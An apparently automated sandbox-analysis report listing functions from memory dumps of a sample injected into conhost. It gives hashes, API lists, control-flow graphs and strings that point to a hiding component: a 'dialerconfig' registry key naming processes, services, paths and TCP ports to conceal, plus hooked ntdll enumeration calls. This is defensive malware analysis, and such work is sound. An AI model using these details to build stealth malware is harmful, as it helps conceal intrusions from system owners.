                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 3a74cfd470538558c8c26451ce8f33b7d3d65cb1e3ef09f26fba14c55d1f06f1
                                                                    • Instruction ID: fdb7b7a556afe5f4f845a9dbe1bdbbd41e74bac74062986e1d3bd1e1cca22565
                                                                    • Opcode Fuzzy Hash: 3a74cfd470538558c8c26451ce8f33b7d3d65cb1e3ef09f26fba14c55d1f06f1
                                                                    • Instruction Fuzzy Hash: 54B09238A03B0AC6EA0A2B526D8734422A8BB88741F98852B800D41320DA2C46A98B80
                                                                    Function 000001DCAFC236F0 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                    • Instruction ID: a67fef582f30a1243d7eb7cd38c3919feacd2944b9feadd57717c30d1f1f1197
                                                                    • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                    • Instruction Fuzzy Hash: F8F0687271425A8EDFA88F29A50279977D1F3083C4FD0851BE69983B44E27C8051CF44
                                                                    Function 000001DCB14E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction ID: 7fd1f2b9199b2627b91c7f89cf310ebad0c506218667db9161078a1e1447a4cd
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: B2711776710A528AEB119F61E882A9923B4FBC5FCCF405A13DA4E93B6DDE34C444CB80
                                                                    Function 000001DCB14E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: 95b6ebe0749b10af2dbb7b5fd8c1f952c7df3020f54f114eaf855ba7c43b4958
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: 99514776200B8586EB55CF62E54939AB7A1F7C9FC9F048626DA4A0776CDF3CC449CB80
                                                                    Function 000001DCB14E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: 22d319d3d01eeefe0df84bbe573a3ded8b84fea0340fb38726a757e16dae8e2c
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: D231917610098BA0EE0AEFA5E8677E42324F7D57C4F809E13D40E4226E9E78C24DDBD1
                                                                    Function 000001DCAFC16910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 205 1dcafc16910-1dcafc16916 206 1dcafc16951-1dcafc1695b 205->206 207 1dcafc16918-1dcafc1691b 205->207 210 1dcafc16a78-1dcafc16a8d 206->210 208 1dcafc1691d-1dcafc16920 207->208 209 1dcafc16945-1dcafc16984 call 1dcafc16fc0 207->209 211 1dcafc16922-1dcafc16925 208->211 212 1dcafc16938 __scrt_dllmain_crt_thread_attach 208->212 225 1dcafc16a52 209->225 226 1dcafc1698a-1dcafc1699f call 1dcafc16e54 209->226 213 1dcafc16a9c-1dcafc16ab6 call 1dcafc16e54 210->213 214 1dcafc16a8f 210->214 216 1dcafc16931-1dcafc16936 call 1dcafc16f04 211->216 217 1dcafc16927-1dcafc16930 211->217 220 1dcafc1693d-1dcafc16944 212->220 228 1dcafc16aef-1dcafc16b20 call 1dcafc17190 213->228 229 1dcafc16ab8-1dcafc16aed call 1dcafc16f7c call 1dcafc16e1c call 1dcafc17318 call 1dcafc17130 call 1dcafc17154 call 1dcafc16fac 213->229 218 1dcafc16a91-1dcafc16a9b 214->218 216->220 230 1dcafc16a54-1dcafc16a69 225->230 237 1dcafc169a5-1dcafc169b6 call 1dcafc16ec4 226->237 238 1dcafc16a6a-1dcafc16a77 call 1dcafc17190 226->238 239 1dcafc16b31-1dcafc16b37 228->239 240 1dcafc16b22-1dcafc16b28 228->240 229->218 257 1dcafc16a07-1dcafc16a11 call 1dcafc17130 237->257 258 1dcafc169b8-1dcafc169dc call 1dcafc172dc call 1dcafc16e0c call 1dcafc16e38 call 1dcafc1ac0c 237->258 238->210 245 1dcafc16b7e-1dcafc16b94 call 1dcafc1268c 239->245 246 1dcafc16b39-1dcafc16b43 239->246 240->239 244 1dcafc16b2a-1dcafc16b2c 240->244 251 1dcafc16c1f-1dcafc16c2c 244->251 266 1dcafc16bcc-1dcafc16bce 245->266 267 1dcafc16b96-1dcafc16b98 245->267 252 1dcafc16b4f-1dcafc16b5d call 1dcafc25780 246->252 253 1dcafc16b45-1dcafc16b4d 246->253 260 1dcafc16b63-1dcafc16b78 call 1dcafc16910 252->260 270 1dcafc16c15-1dcafc16c1d 252->270 253->260 257->225 278 1dcafc16a13-1dcafc16a1f call 1dcafc17180 257->278 258->257 308 1dcafc169de-1dcafc169e5 __scrt_dllmain_after_initialize_c 258->308 260->245 260->270 268 1dcafc16bd0-1dcafc16bd3 266->268 269 1dcafc16bd5-1dcafc16bea call 1dcafc16910 266->269 267->266 275 1dcafc16b9a-1dcafc16bbc call 1dcafc1268c call 1dcafc16a78 267->275 268->269 268->270 269->270 287 1dcafc16bec-1dcafc16bf6 269->287 270->251 275->266 302 1dcafc16bbe-1dcafc16bc6 call 1dcafc25780 275->302 295 1dcafc16a21-1dcafc16a2b call 1dcafc17098 278->295 296 1dcafc16a45-1dcafc16a50 278->296 292 1dcafc16c01-1dcafc16c11 call 1dcafc25780 287->292 293 1dcafc16bf8-1dcafc16bff 287->293 292->270 293->270 295->296 307 1dcafc16a2d-1dcafc16a3b 295->307 296->230 302->266 307->296 308->257 309 1dcafc169e7-1dcafc16a04 call 1dcafc1abc8 308->309 309->257
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 2c63e2b343774ad3a528a038cbf48f4e5551476b91f2fe6909fa88b6cd80bba5
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 9381AF3360024F86FE70AB2794413D96290EB85B8CF568D17BB45477D6FB38C866E788
                                                                    Function 000001DCB14ECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 000001DCB14ECE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECEBC
                                                                    • SetLastError.KERNEL32 ref: 000001DCB14ECED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,000001DCB14EECCC,?,?,?,?,000001DCB14EBF9F,?,?,?,?,?,000001DCB14E7AB0), ref: 000001DCB14ECF2C
                                                                      • Part of subcall function 000001DCB14ED6CC: HeapAlloc.KERNEL32 ref: 000001DCB14ED721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECF54
                                                                      • Part of subcall function 000001DCB14ED744: HeapFree.KERNEL32 ref: 000001DCB14ED75A
                                                                      • Part of subcall function 000001DCB14ED744: GetLastError.KERNEL32 ref: 000001DCB14ED764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001DCB14F0A6B,?,?,?,000001DCB14F045C,?,?,?,000001DCB14EC84F), ref: 000001DCB14ECF76
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: 8472098aecf7446318d95559cce1bbf97e3c754e495a61f4a1512eb5b1765314
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: 2841613234124746FA6CA77555673FA22425BD47F4F14CF27A83A466EEDE28C841CEC1
                                                                    Function 000001DCB14E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: c7a76ba4b916e0e6af30ab75d366d6868590697ec1052ee24e116cb029115e3b
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: C8213872614A4286EB24CB25E4497AA67A0F7C9BE4F504717EA5E02BACCF3CC149CF40
                                                                    Function 000001DCAFC19944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 463 1dcafc19944-1dcafc199ac call 1dcafc1a814 466 1dcafc19e13-1dcafc19e1b call 1dcafc1bb48 463->466 467 1dcafc199b2-1dcafc199b5 463->467 467->466 468 1dcafc199bb-1dcafc199c1 467->468 470 1dcafc19a90-1dcafc19aa2 468->470 471 1dcafc199c7-1dcafc199cb 468->471 473 1dcafc19d63-1dcafc19d67 470->473 474 1dcafc19aa8-1dcafc19aac 470->474 471->470 475 1dcafc199d1-1dcafc199dc 471->475 478 1dcafc19da0-1dcafc19daa call 1dcafc18a34 473->478 479 1dcafc19d69-1dcafc19d70 473->479 474->473 476 1dcafc19ab2-1dcafc19abd 474->476 475->470 477 1dcafc199e2-1dcafc199e7 475->477 476->473 480 1dcafc19ac3-1dcafc19aca 476->480 477->470 481 1dcafc199ed-1dcafc199f7 call 1dcafc18a34 477->481 478->466 492 1dcafc19dac-1dcafc19dcb call 1dcafc16d40 478->492 479->466 482 1dcafc19d76-1dcafc19d9b call 1dcafc19e1c 479->482 484 1dcafc19ad0-1dcafc19b07 call 1dcafc18e10 480->484 485 1dcafc19c94-1dcafc19ca0 480->485 481->492 497 1dcafc199fd-1dcafc19a28 call 1dcafc18a34 * 2 call 1dcafc19124 481->497 482->478 484->485 501 1dcafc19b0d-1dcafc19b15 484->501 485->478 489 1dcafc19ca6-1dcafc19caa 485->489 494 1dcafc19cac-1dcafc19cb8 call 1dcafc190e4 489->494 495 1dcafc19cba-1dcafc19cc2 489->495 494->495 507 1dcafc19cdb-1dcafc19ce3 494->507 495->478 500 1dcafc19cc8-1dcafc19cd5 call 1dcafc18cb4 495->500 532 1dcafc19a48-1dcafc19a52 call 1dcafc18a34 497->532 533 1dcafc19a2a-1dcafc19a2e 497->533 500->478 500->507 505 1dcafc19b19-1dcafc19b4b 501->505 509 1dcafc19b51-1dcafc19b5c 505->509 510 1dcafc19c87-1dcafc19c8e 505->510 512 1dcafc19df6-1dcafc19e12 call 1dcafc18a34 * 2 call 1dcafc1baa8 507->512 513 1dcafc19ce9-1dcafc19ced 507->513 509->510 514 1dcafc19b62-1dcafc19b7b 509->514 510->485 510->505 512->466 516 1dcafc19cef-1dcafc19cfe call 1dcafc190e4 513->516 517 1dcafc19d00 513->517 518 1dcafc19b81-1dcafc19bc6 call 1dcafc190f8 * 2 514->518 519 1dcafc19c74-1dcafc19c79 514->519 522 1dcafc19d03-1dcafc19d0d call 1dcafc1a8ac 516->522 517->522 544 1dcafc19c04-1dcafc19c0a 518->544 545 1dcafc19bc8-1dcafc19bee call 1dcafc190f8 call 1dcafc1a038 518->545 525 1dcafc19c84 519->525 522->478 542 1dcafc19d13-1dcafc19d61 call 1dcafc18d44 call 1dcafc18f50 522->542 525->510 532->470 548 1dcafc19a54-1dcafc19a74 call 1dcafc18a34 * 2 call 1dcafc1a8ac 532->548 533->532 535 1dcafc19a30-1dcafc19a3b 533->535 535->532 541 1dcafc19a3d-1dcafc19a42 535->541 541->466 541->532 542->478 552 1dcafc19c0c-1dcafc19c10 544->552 553 1dcafc19c7b 544->553 563 1dcafc19bf0-1dcafc19c02 545->563 564 1dcafc19c15-1dcafc19c72 call 1dcafc19870 545->564 569 1dcafc19a76-1dcafc19a80 call 1dcafc1a99c 548->569 570 1dcafc19a8b 548->570 552->518 557 1dcafc19c80 553->557 557->525 563->544 563->545 564->557 573 1dcafc19df0-1dcafc19df5 call 1dcafc1baa8 569->573 574 1dcafc19a86-1dcafc19def call 1dcafc186ac call 1dcafc1a3f4 call 1dcafc188a0 569->574 570->470 573->512 574->573
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: d569f88fc8552f40569cbeb25852737fc883cf8385d57af584686ff550b99f64
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: EDE19B33604B4A8AEF709B26D4803DD77A0F745B8CF110A16EE8957BD9EB38C1A1C784
                                                                    Function 000001DCB14EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 584 1dcb14ea544-1dcb14ea5ac call 1dcb14eb414 587 1dcb14ea5b2-1dcb14ea5b5 584->587 588 1dcb14eaa13-1dcb14eaa1b call 1dcb14ec748 584->588 587->588 589 1dcb14ea5bb-1dcb14ea5c1 587->589 591 1dcb14ea5c7-1dcb14ea5cb 589->591 592 1dcb14ea690-1dcb14ea6a2 589->592 591->592 596 1dcb14ea5d1-1dcb14ea5dc 591->596 594 1dcb14ea6a8-1dcb14ea6ac 592->594 595 1dcb14ea963-1dcb14ea967 592->595 594->595 597 1dcb14ea6b2-1dcb14ea6bd 594->597 599 1dcb14ea969-1dcb14ea970 595->599 600 1dcb14ea9a0-1dcb14ea9aa call 1dcb14e9634 595->600 596->592 598 1dcb14ea5e2-1dcb14ea5e7 596->598 597->595 602 1dcb14ea6c3-1dcb14ea6ca 597->602 598->592 603 1dcb14ea5ed-1dcb14ea5f7 call 1dcb14e9634 598->603 599->588 604 1dcb14ea976-1dcb14ea99b call 1dcb14eaa1c 599->604 600->588 610 1dcb14ea9ac-1dcb14ea9cb call 1dcb14e7940 600->610 606 1dcb14ea894-1dcb14ea8a0 602->606 607 1dcb14ea6d0-1dcb14ea707 call 1dcb14e9a10 602->607 603->610 618 1dcb14ea5fd-1dcb14ea628 call 1dcb14e9634 * 2 call 1dcb14e9d24 603->618 604->600 606->600 611 1dcb14ea8a6-1dcb14ea8aa 606->611 607->606 622 1dcb14ea70d-1dcb14ea715 607->622 615 1dcb14ea8ba-1dcb14ea8c2 611->615 616 1dcb14ea8ac-1dcb14ea8b8 call 1dcb14e9ce4 611->616 615->600 621 1dcb14ea8c8-1dcb14ea8d5 call 1dcb14e98b4 615->621 616->615 628 1dcb14ea8db-1dcb14ea8e3 616->628 651 1dcb14ea62a-1dcb14ea62e 618->651 652 1dcb14ea648-1dcb14ea652 call 1dcb14e9634 618->652 621->600 621->628 626 1dcb14ea719-1dcb14ea74b 622->626 630 1dcb14ea887-1dcb14ea88e 626->630 631 1dcb14ea751-1dcb14ea75c 626->631 634 1dcb14ea8e9-1dcb14ea8ed 628->634 635 1dcb14ea9f6-1dcb14eaa12 call 1dcb14e9634 * 2 call 1dcb14ec6a8 628->635 630->606 630->626 631->630 636 1dcb14ea762-1dcb14ea77b 631->636 637 1dcb14ea900 634->637 638 1dcb14ea8ef-1dcb14ea8fe call 1dcb14e9ce4 634->638 635->588 639 1dcb14ea874-1dcb14ea879 636->639 640 1dcb14ea781-1dcb14ea7c6 call 1dcb14e9cf8 * 2 636->640 648 1dcb14ea903-1dcb14ea90d call 1dcb14eb4ac 637->648 638->648 644 1dcb14ea884 639->644 665 1dcb14ea7c8-1dcb14ea7ee call 1dcb14e9cf8 call 1dcb14eac38 640->665 666 1dcb14ea804-1dcb14ea80a 640->666 644->630 648->600 663 1dcb14ea913-1dcb14ea961 call 1dcb14e9944 call 1dcb14e9b50 648->663 651->652 656 1dcb14ea630-1dcb14ea63b 651->656 652->592 669 1dcb14ea654-1dcb14ea674 call 1dcb14e9634 * 2 call 1dcb14eb4ac 652->669 656->652 661 1dcb14ea63d-1dcb14ea642 656->661 661->588 661->652 663->600 684 1dcb14ea815-1dcb14ea872 call 1dcb14ea470 665->684 685 1dcb14ea7f0-1dcb14ea802 665->685 673 1dcb14ea87b 666->673 674 1dcb14ea80c-1dcb14ea810 666->674 689 1dcb14ea68b 669->689 690 1dcb14ea676-1dcb14ea680 call 1dcb14eb59c 669->690 675 1dcb14ea880 673->675 674->640 675->644 684->675 685->665 685->666 689->592 694 1dcb14ea686-1dcb14ea9ef call 1dcb14e92ac call 1dcb14eaff4 call 1dcb14e94a0 690->694 695 1dcb14ea9f0-1dcb14ea9f5 call 1dcb14ec6a8 690->695 694->695 695->635
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: 6ecf1a183cf1d1d4fec6df5e12389d50badd219e6cbb280593295e9d49b1cac5
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: A8E16A736007428AEB28DB65D4823ED77A0F7957D8F208A17EA8957B9DCB34C495CB80
                                                                    Function 000001DCB14EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction ID: fa538d2221599b028fad7d63d81caad2134e880067337332accdb60296f321d1
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: 7341E233311A0291EA1ACB66A8067D52395F7D8BE0F088B379D0E8778DEE3CC445CB80
                                                                    Function 000001DCB14E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 735 1dcb14e104c-1dcb14e10b9 RegQueryInfoKeyW 736 1dcb14e11b5-1dcb14e11d0 735->736 737 1dcb14e10bf-1dcb14e10c9 735->737 737->736 738 1dcb14e10cf-1dcb14e111f RegEnumValueW 737->738 739 1dcb14e11a5-1dcb14e11af 738->739 740 1dcb14e1125-1dcb14e112a 738->740 739->736 739->738 740->739 741 1dcb14e112c-1dcb14e1135 740->741 742 1dcb14e1147-1dcb14e114c 741->742 743 1dcb14e1137 741->743 744 1dcb14e1199-1dcb14e11a3 742->744 745 1dcb14e114e-1dcb14e1193 GetProcessHeap call 1dcb14f6168 GetProcessHeap HeapFree 742->745 746 1dcb14e113b-1dcb14e113f 743->746 744->739 745->744 746->739 747 1dcb14e1141-1dcb14e1145 746->747 747->742 747->746
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: 6b4d686118abf198f5e775a7a98892e9e618a4a08ab2d5ebfd87a68ce17c5090
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: C5415E73214B85CAEB64CF21E44579EB7A1F389BD8F44862ADA8907B5CDF38C549CB40
                                                                    Function 000001DCB14ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,000001DCB14EC7DE,?,?,?,?,?,?,?,?,000001DCB14ECF9D,?,?,00000001), ref: 000001DCB14ED087
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14EC7DE,?,?,?,?,?,?,?,?,000001DCB14ECF9D,?,?,00000001), ref: 000001DCB14ED0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14EC7DE,?,?,?,?,?,?,?,?,000001DCB14ECF9D,?,?,00000001), ref: 000001DCB14ED0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14EC7DE,?,?,?,?,?,?,?,?,000001DCB14ECF9D,?,?,00000001), ref: 000001DCB14ED0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001DCB14EC7DE,?,?,?,?,?,?,?,?,000001DCB14ECF9D,?,?,00000001), ref: 000001DCB14ED0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: 9993e0b12fb643eb156e0693487c34cd396c8ec0da258143c0739b505cc70314
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: 6B11867270428646FA6C973655573E961455BC47F4F18CF27A83E877DEDE28C442CE80
                                                                    Function 000001DCB14E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
